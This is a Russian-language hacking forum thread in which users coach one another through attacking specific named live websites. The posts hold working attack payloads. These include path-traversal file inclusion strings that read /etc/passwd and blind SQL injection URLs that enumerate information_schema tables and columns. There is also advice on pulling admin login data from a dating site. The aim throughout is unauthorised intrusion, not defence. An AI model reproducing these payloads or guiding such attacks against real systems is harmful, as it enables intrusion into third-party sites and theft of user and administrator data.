Ваши вопросы по уязвимостям.

include_once ('./lang/'.$lang_include);

возможно ли что-либо подинклюдить, кроме как с папки lang?

 

u36a, если RG - on, то ?lang_include=../../../(...)/etc/passwd

 

Да, если нету фильтра на ../

 

я так понимаю, что фильтра нет, просто, если пишешь с ../ и указываешь любое имя файла, то уже нет ошибки о том, что файл не существует, это и насторожило..

 

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=

 

Незнаю как раскрутить _http://www.lovepage.it/dating-online/cronologia.asp?id=%27%27
Что поставить вместо id чтобы подбирать таблицы union+select+1 и тд

 

http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb'+and+if(ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))>1,1,0)--+

 

А как таблицы узнать?И данные выводить.

 

https://forum.antichat.ru/threadnav43966-1-10.html

3.1 Посимвольный перебор

 

Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.

 

https://forum.antichat.ru/thread24918.html
https://forum.antichat.ru/thread119047.html

 

Это к примеру как выглядит твой запрос поначалу.

Конечно столбцы могут называться по другому, я тебе просто привёл пример.

А вобще юзай поиск, или же читай тему про SQL Инъекцию.

 

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=index.php так этот инклюд можно как-то раскрутить или не? Просто не понимаю есть фильтр или нет.

 

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
Скорее всего есть чем нету.

 

Это инклюд, но инклюд с фильтром.
В lang нельзя использовать

PHP:

$values = array('/','\\','?','&','%','#','~',':',' ','<','>','*','+','@','"',"'",'|',"\r","\n","\t");

 

Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет
Узнал что есть таблица acces.
Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(substring((select+column_name+from+acces),1,1))%3E=1,1,0)--+
Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(substring((select+column_name+from++CHARACTER_SETS),1,1))%3E=1,1,0)--+
Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями )

 

http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите

 

Так как только с GET полявляется .. или / ошибки пропадают, откуда я знаю обход срабатывает или нет?

Этот инклюд тоже глухой?

 

Тут вообще его нет =\ похоже на ошибку в логике скрипта